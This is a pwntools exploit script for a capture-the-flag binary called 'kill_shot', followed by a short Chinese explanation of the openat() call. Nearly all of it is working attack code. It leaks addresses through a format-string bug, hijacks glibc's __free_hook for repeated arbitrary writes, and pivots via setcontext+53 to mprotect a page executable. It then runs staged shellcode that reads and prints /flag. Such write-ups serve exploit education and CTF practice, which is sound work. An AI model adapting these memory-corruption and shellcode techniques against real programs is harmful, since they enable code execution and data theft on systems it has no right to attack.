setcontext + 53
#! /usr/bin/python | |
#-*- coding: utf-8 -*- | |
from pwn import * | |
# gdb.attach() opens the debugger in a horizontal tmux split.
context.terminal = ['tmux', 'splitw', '-h']
# 64-bit Linux target; 'debug' logs every byte exchanged with the process,
# which is what you want while stepping through a multi-stage write chain.
context.update(arch='amd64', os='linux', log_level='debug')
p = process('./kill_shot')
# Uncomment to break inside the binary (PIE-relative address).
# gdb.attach(p, 'b *$rebase(0x1098)\n')
def add(size, payload):
    """Menu option 1: allocate ``size`` bytes and store ``payload`` in them.

    Answers the target's three prompts in order (menu choice, size, data)
    over the global ``p`` tube; every answer goes out with a trailing
    newline.
    """
    answers = (
        ('3- exit', str(1)),
        ("Size:", str(size)),
        ("Data:", payload),
    )
    for prompt, answer in answers:
        p.sendlineafter(prompt, answer)
def delete(idx):
    """Menu option 2: free the chunk stored at index ``idx``.

    The free() this triggers is what fires ``__free_hook`` in the main
    script, so every call here is one hook invocation.
    """
    choice, index = str(2), str(idx)
    p.sendlineafter('3- exit', choice)
    p.sendlineafter("Index:", index)
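if __name__ == "__main__":
    # --- Stage 0: leak PIE and libc through the format-string prompt --------
    # Stack slots 24 and 25 hold a binary return address and a libc return
    # address.  0x1240 and 0x21b97 are their distances from the respective
    # bases for *this* binary/libc build (0x21b97 looks like
    # __libc_start_main+231 of Ubuntu 18.04 glibc 2.27 -- confirm); re-derive
    # both for any other build.
    p.sendlineafter("Format:", "AAAA%24$p.%25$p.")
    p.recvuntil("AAAA")
    pie = int(p.recvuntil(".")[:-1], 16) - 0x1240
    libc = int(p.recvuntil(".")[:-1], 16) - 0x021b97
    success("LIBC: " + hex(libc))
    success("PIE : " + hex(pie))

    # Hard-coded libc symbol offsets (same libc build as above -- confirm
    # with readelf/pwntools against the target's libc before reuse).
    setcontext = libc + 0x0000000000052070
    __free_hook = libc + 0x00000000003ed8e8
    mprotect = libc + 0x000000000011bae0
    # Binary routine that every free() re-enters once it is in __free_hook.
    # Judging by the Pointer:/Content: prompts that follow each delete()
    # below, it hands out the program's arbitrary write again.
    kill = pie + 0x10B4

    # --- Stage 1: turn the single arbitrary write into unlimited writes -----
    p.sendlineafter("Pointer:", str(__free_hook))
    p.sendafter("Content:", p64(kill))
    # gdb.attach(p, "b *%s\n" % hex((setcontext + 53)))

    # The page containing __free_hook is made RWX and later holds both
    # shellcode stages.
    page = __free_hook & 0xfffffffffffff000
    stage1_addr = __free_hook + 0x18

    # Register file for setcontext+53.  The gadget loads rsp/rdi/rsi/rdx/rip
    # (among others) from memory at rdi, and rdi is the chunk being freed --
    # which we fill with this frame -- so the final free(chunk) becomes
    #     mprotect(page, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC)
    # followed by a `ret` through [rsp] = [__free_hook + 0x10] = stage1_addr.
    frame = SigreturnFrame()
    frame.rsp = __free_hook + 0x10
    frame.rdi = page
    frame.rsi = 0x1000
    frame.rdx = 7  # PROT_READ | PROT_WRITE | PROT_EXEC
    frame.rip = mprotect
    # bytes() rather than str(): identical on Python 2, and the only form that
    # yields the packed frame (not a repr) on Python 3 pwntools.
    payload = bytes(frame)

    # Stage-1 shellcode: read(0, page, 0x1000) and jump to whatever arrived.
    # rsi survives the syscall (the kernel clobbers only rcx and r11), so
    # `jmp rsi` lands on the stage-2 bytes at the page base.
    stage1 = asm('''
        xor rdi, rdi
        mov rsi, %d
        mov rdx, 0x1000
        mov rax, 0
        syscall
        jmp rsi
    ''' % page)
    # The hook-driven primitive writes one qword at a time, so pad the stage
    # to a multiple of 8 with NOPs instead of relying on its exact encoded
    # size (a different assembler backend would otherwise silently drop the
    # tail).
    stage1 += b'\x90' * (-len(stage1) % 8)
    assert stage1_addr + len(stage1) <= page + 0x1000, "stage 1 spills past the RWX page"

    # Write plan.  Each entry is delivered by add()+delete(): the free()
    # re-enters the routine at `kill`, which prompts for Pointer:/Content:.
    writes = [
        # Likely redundant (setcontext pushes rip just below the new rsp,
        # which is this slot), but kept as in the proven sequence.
        (__free_hook + 0x8, p64(stage1_addr)),
        # [new rsp]: mprotect's `ret` pops this and lands on stage 1.
        (__free_hook + 0x10, p64(stage1_addr)),
    ]
    writes += [
        (stage1_addr + off, stage1[off:off + 8])
        for off in range(0, len(stage1), 8)
    ]
    # Last: swap the hook itself for the gadget so the next free() fires it.
    writes.append((__free_hook, p64(setcontext + 53)))

    # Two chunks exist before the first delete(1) in the working sequence;
    # which index the program assigns to each is not visible here, so the
    # allocation order is kept exactly.
    add(0x100, payload)  # 1
    for addr, qword in writes:
        add(0x100, payload)
        delete(1)
        p.sendlineafter("Pointer:", str(addr))
        p.sendafter("Content:", qword)

    # This free() runs setcontext+53 on the frame -> mprotect -> stage 1,
    # which then blocks in read() waiting for stage 2 on stdin.
    add(0x100, payload)
    delete(1)

    # --- Stage 2: open/read/write the flag, delivered through stage 1 -------
    # openat(0, "/flag", O_RDONLY): syscall 257 rather than open(2); the dirfd
    # (rdi = 0) is ignored because the path is absolute.  If the target runs
    # under a seccomp filter, which of open/openat it permits decides this
    # choice (not visible here).  0x67616c662f is "/flag" little-endian and
    # the upper imm64 bytes already NUL-terminate it; the preceding push of 0
    # is an extra terminator.  The flag is read into at most 0x50 bytes --
    # longer flags are truncated -- then written to stdout and the process
    # exits cleanly.
    stage2 = asm('''
        xor rdi, rdi
        push rdi
        mov rdi, 0x67616c662f
        push rdi
        mov rsi, rsp
        xor rdi, rdi
        xor rdx, rdx
        mov rax, 257
        syscall
        mov rdi, rax
        mov rsi, rsp
        mov rdx, 0x50
        mov rax, 0
        syscall
        mov rdi, 1
        mov rsi, rsp
        mov rdx, rax
        mov rax, 1
        syscall
        mov rdi, 0
        mov rax, 60
        syscall
    ''')
    # Stage 1's read() drops these bytes at the page base while stage 1 itself
    # is still executing at stage1_addr; they must not reach it (+1 for the
    # newline sendline appends).
    assert len(stage2) + 1 <= stage1_addr - page, "stage 2 would overwrite stage 1"
    p.sendline(stage2)
    p.interactive()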
openat()
1、函数原型：
int openat(int fd, const char *path, int oflag, ... /* mode_t mode */);
2、头文件：
#include <fcntl.h>
3、参数说明：
（1）fd：相对于 open 函数，此函数多了一个 fd 参数，异同点如下：
a、若 path 指定的是绝对路径，fd 参数被忽略，openat 函数相当于 open 函数；
b、若 path 指定的是相对路径，fd 参数指出了相对路径名在文件系统中的开始位置，fd 参数是通过打开相对路径名所在的目录来获取的；
c、若 path 指定了相对路径名，而 fd 参数具有特殊值 AT_FDCWD，在此情况下，路径名在当前工作目录中获取，openat 函数在操作上与 open 类似。
（2）其余参数与 open 一致，在此不重复。
（补充：x86-64 上 openat 的系统调用号为 257，即上面 shellcode 中 `mov rax, 257` 所用；该 shellcode 传入的是绝对路径 "/flag"，因此对应上述 a 情况，rdi 中的 fd=0 被忽略。）